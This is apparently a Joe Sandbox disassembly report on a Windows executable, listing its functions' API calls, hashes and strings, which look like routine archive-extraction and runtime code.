                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: bffb5bc56fcfbbfe2735e91b56e4b96c9b59f85bc011faa0683f115e7312f41a
                                                                                                                    • Instruction ID: b269582b6b8d0abde51de6825fd23f3c0fe0828cc96572e8c5336aad0e1491d2
                                                                                                                    • Opcode Fuzzy Hash: bffb5bc56fcfbbfe2735e91b56e4b96c9b59f85bc011faa0683f115e7312f41a
                                                                                                                    • Instruction Fuzzy Hash: 52A011E2AA8882BC300C2220AC02C3F020CC3C2F22330882EFC8A88082BC800E080830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: b21b90e87df309248278b5524e00649cdd65c9bc42a20804cd07feb925d31864
                                                                                                                    • Instruction ID: 85f75f05974cc2932cf69e8af298a8556a5417ce5618011fc45ddefd24224cfa
                                                                                                                    • Opcode Fuzzy Hash: b21b90e87df309248278b5524e00649cdd65c9bc42a20804cd07feb925d31864
                                                                                                                    • Instruction Fuzzy Hash: 76A011E2AA82803C300C22A0AC02C3B020CC3C0B23330822EFC8888082BC802A080830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • SetEndOfFile.KERNELBASE(?,0004903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00049F0C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: File
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 749574446-0
                                                                                                                    APIs
                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0005AE72,C:\Users\user\Desktop,00000000,0008946A,00000006), ref: 0005AC08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611563598-0
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,000495D6,?,?,?,?,?,00072641,000000FF), ref: 0004963B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0005C2B1
                                                                                                                    • EndDialog.USER32(?,00000006), ref: 0005C2C4
                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0005C2E0
                                                                                                                    • SetFocus.USER32(00000000), ref: 0005C2E7
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0005C321
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0005C358
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0005C36E
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0005C38C
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005C39C
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0005C3B8
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005C3D4
                                                                                                                    • _swprintf.LIBCMT ref: 0005C404
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0005C417
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0005C41E
                                                                                                                    • _swprintf.LIBCMT ref: 0005C477
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0005C48A
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0005C4A7
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0005C4C7
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005C4D7
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0005C4F1
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005C509
                                                                                                                    • _swprintf.LIBCMT ref: 0005C535
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0005C548
                                                                                                                    • _swprintf.LIBCMT ref: 0005C59C
                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0005C5AF
                                                                                                                      • Part of subcall function 0005AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0005AF35
                                                                                                                      • Part of subcall function 0005AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0007E72C,?,?), ref: 0005AF84
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                    • API String ID: 797121971-1840816070
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00046FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00047013
                                                                                                                    • _wcslen.LIBCMT ref: 00047084
                                                                                                                      • Part of subcall function 00047A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00047AAB
                                                                                                                      • Part of subcall function 00047A9C: GetLastError.KERNEL32 ref: 00047AF1
                                                                                                                      • Part of subcall function 00047A9C: CloseHandle.KERNEL32(?), ref: 00047B00
                                                                                                                      • Part of subcall function 0004A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0004977F,?,?,000495CF,?,?,?,?,?,00072641,000000FF), ref: 0004A1F1
                                                                                                                      • Part of subcall function 0004A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0004977F,?,?,000495CF,?,?,?,?,?,00072641), ref: 0004A21F
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00047139
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00047155
                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00047298
                                                                                                                      • Part of subcall function 00049DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000473BC,?,?,?,00000000), ref: 00049DBC
                                                                                                                      • Part of subcall function 00049DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00049E70
                                                                                                                      • Part of subcall function 00049620: CloseHandle.KERNELBASE(000000FF,?,?,000495D6,?,?,?,?,?,00072641,000000FF), ref: 0004963B
                                                                                                                      • Part of subcall function 0004A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A501
                                                                                                                      • Part of subcall function 0004A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                    • Opcode ID: 4e5dd1bf840c2f56e483679b64c1541bbe3cba8615e4901b4036229cd9450375
                                                                                                                    • Instruction ID: 8d11d045f938c2c73c173ee09c6ee4ccf5f8df747b02d97e601be9624d157968
                                                                                                                    • Opcode Fuzzy Hash: 4e5dd1bf840c2f56e483679b64c1541bbe3cba8615e4901b4036229cd9450375
                                                                                                                    • Instruction Fuzzy Hash: 63C1B3F1D04644AAEB25EF74CC85FEFB7A8AF04300F004569F95AE7183D774AA848B65
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __floor_pentium4
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                    • Opcode ID: 3963cb21979060a29af17e64431df566c7b50b56b09c88a495a9662bd0908793
                                                                                                                    • Instruction ID: cd05f993aa19eb317acf45225147d927a48c53f1375dfb1158e3f59259db3182
                                                                                                                    • Opcode Fuzzy Hash: 3963cb21979060a29af17e64431df566c7b50b56b09c88a495a9662bd0908793
                                                                                                                    • Instruction Fuzzy Hash: 4EC24775E086688FDB65CE28DD447EAB7F6EB44304F1441EAD80EE7241E779AE818F40
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog_swprintf
                                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                                    • API String ID: 146138363-3282847064
                                                                                                                    • Opcode ID: 9fd73c476415f385956742a049f50861e88d086e1366efad997dde1f25f265c0
                                                                                                                    • Instruction ID: 4d8cdb0732125165aecf4775753388cf9bdbb86b2d9b5c5f48732fac4fdccea3
                                                                                                                    • Opcode Fuzzy Hash: 9fd73c476415f385956742a049f50861e88d086e1366efad997dde1f25f265c0
                                                                                                                    • Instruction Fuzzy Hash: 9032E6B1510384ABEF58DF74C895AEA37E5AF15300F04547DFD8A8B283DB70AA49CB64
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00042874
                                                                                                                    • _strlen.LIBCMT ref: 00042E3F
                                                                                                                      • Part of subcall function 000502BA: __EH_prolog.LIBCMT ref: 000502BF
                                                                                                                      • Part of subcall function 00051B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004BAE9,00000000,?,?,?,00010458), ref: 00051BA0
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00042F91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                    • String ID: CMT
                                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                                    • Opcode ID: ee104d35592452eb4fc24442c086e2277d31ae9a90e8c4e86ec8912e276b1685
                                                                                                                    • Instruction ID: bc5bbfe8524f1c1315239dc2b7cd33c829f828ed43234149ec64afb21f66e2a3
                                                                                                                    • Opcode Fuzzy Hash: ee104d35592452eb4fc24442c086e2277d31ae9a90e8c4e86ec8912e276b1685
                                                                                                                    • Instruction Fuzzy Hash: 7C62F5B1A002449FDB19DF34C896AEA7BE1EF54300F08457EFC9A8B283DB759945CB64
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0005F844
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0005F910
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0005F930
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0005F93A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 254469556-0
                                                                                                                    • Opcode ID: f2992ebd710e3a8ec156ef07639d1f57beb6e6e63684d0b829fd7ddca3db5b18
                                                                                                                    • Instruction ID: 81b096659446db2f159ce15f311071027255c6aeb369f2d553f6129ba18c30f9
                                                                                                                    • Opcode Fuzzy Hash: f2992ebd710e3a8ec156ef07639d1f57beb6e6e63684d0b829fd7ddca3db5b18
                                                                                                                    • Instruction Fuzzy Hash: D3314B75D452199BEF11DFA4D9897CDBBF8AF04301F1040AAE40CA7250EB799B888F05
                                                                                                                    APIs
                                                                                                                    • VirtualQuery.KERNEL32(80000000,0005E5E8,0000001C,0005E7DD,00000000,?,?,?,?,?,?,?,0005E5E8,00000004,000A1CEC,0005E86D), ref: 0005E6B4
                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0005E5E8,00000004,000A1CEC,0005E86D), ref: 0005E6CF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 401686933-2746444292
                                                                                                                    • Opcode ID: 65a619167d997f10466ea1c3e069de64b285360973bf7780d35110a7f60afb9e
                                                                                                                    • Instruction ID: ff8599617e5b3b856c3c2db2963bb762ae923b10637116a54bde67b7a1e97f43
                                                                                                                    • Opcode Fuzzy Hash: 65a619167d997f10466ea1c3e069de64b285360973bf7780d35110a7f60afb9e
                                                                                                                    • Instruction Fuzzy Hash: 7201F772A001496BDB18DE29DC09BDE7BEAAFC4325F0CC124ED59D7150E638DA458A80
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00068FB5
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00068FBF
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00068FCC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3906539128-0
                                                                                                                    • Opcode ID: 7e26b3d839620acfd1fab7e7d0c4390c8b12a14cc8a5979d58157105ecd563d8
                                                                                                                    • Instruction ID: a74cb14919d6b891720d1a56e634a7c502ab2612a3c735c64c7d60a15c81d665
                                                                                                                    • Opcode Fuzzy Hash: 7e26b3d839620acfd1fab7e7d0c4390c8b12a14cc8a5979d58157105ecd563d8
                                                                                                                    • Instruction Fuzzy Hash: D431D674901219ABCB21DF24DC88BDDBBB8AF08310F5042EAE81CA7251EB749F858F55
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction ID: c6b1f4cd19567df40c06327fd09145cdff3a235b1f45d825a1a7209126330f88
                                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction Fuzzy Hash: 12020D71E002199FDF14CFA9C9846ADB7F2EF48314F15816AD919EB385E731AE41CB90
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0005AF35
                                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0007E72C,?,?), ref: 0005AF84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2169056816-0
                                                                                                                    • Opcode ID: 5764fc3acfdf832c6741a98da6fe4f25301537cb92b83c4915d48571e7629d76
                                                                                                                    • Instruction ID: 4ab1104002f5406e37dbff60470c0e89643f0ef297da0fc2ee465e1dad4ce2a2
                                                                                                                    • Opcode Fuzzy Hash: 5764fc3acfdf832c6741a98da6fe4f25301537cb92b83c4915d48571e7629d76
                                                                                                                    • Instruction Fuzzy Hash: A801717A500349AAE7109F65EC45F9B77BCFF09711F408022FA09E7150D3789954CBA5
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00046DDF,00000000,00000400), ref: 00046C74
                                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00046C95
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: fc8f510d1c74f9e5480d8fc1e35d83a7120096ca69d9e1478112318d629f4e08
                                                                                                                    • Instruction ID: 5ac93b5370a26274f056c2d83f4903ede06a32d2cbe31dc45642d0bec83d97bd
                                                                                                                    • Opcode Fuzzy Hash: fc8f510d1c74f9e5480d8fc1e35d83a7120096ca69d9e1478112318d629f4e08
                                                                                                                    • Instruction Fuzzy Hash: ABD0A970344300BFFA100BA18C46F2A3B98FF42B41F18C014B388E80E0DA798460B62A
                                                                                                                    APIs
                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000719EF,?,?,00000008,?,?,0007168F,00000000), ref: 00071C21
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3997070919-0
                                                                                                                    • Opcode ID: f38b6565f68e022843b6d60c32b8ebc9e399d3a5da718db0ca623c5e3c19e772
